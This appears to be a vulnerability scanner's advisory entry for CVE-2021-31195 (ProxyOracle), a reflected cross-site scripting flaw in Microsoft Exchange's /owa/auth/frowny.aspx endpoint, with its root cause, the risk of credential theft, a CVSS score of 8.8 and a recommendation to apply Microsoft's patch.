Microsoft Exchange - Reflected Cross-Site Scripting (ProxyOracle - CVE-2021-31195) (CVE-2021-31195)
- Severity
- CVSSv3 Score
- 8.8
- Vulnerability description
Microsoft Exchange server is affected by a Cross-Site Scripting (XSS) attack which can be performed at the /owa/auth/frowny.aspx endpoint. The root cause of this vulnerability is the lack of input validation in the Client Access Service (CAS) Frontend. An attacker can exploit this vulnerability to inject malicious JavaScript code in the URI.
- Risk description
The risk exists that a remote unauthenticated attacker could exploit this vulnerability and send malicious URLs to the Exchange clients which can then steal their unencrypted usernames and passwords if accessed.
- Recommendation
Applying the latest Microsoft patch for the Exchange Server will fix this vulnerability.
- Codename
- ProxyOracle
- Detectable with
- Network Scanner
- Exploitable with Sniper
- No
- Vuln date
- May 2021
- Published at
- Updated at
- Software Type
- Email server
- Vendor
- Microsoft
- Product
- Exchange Server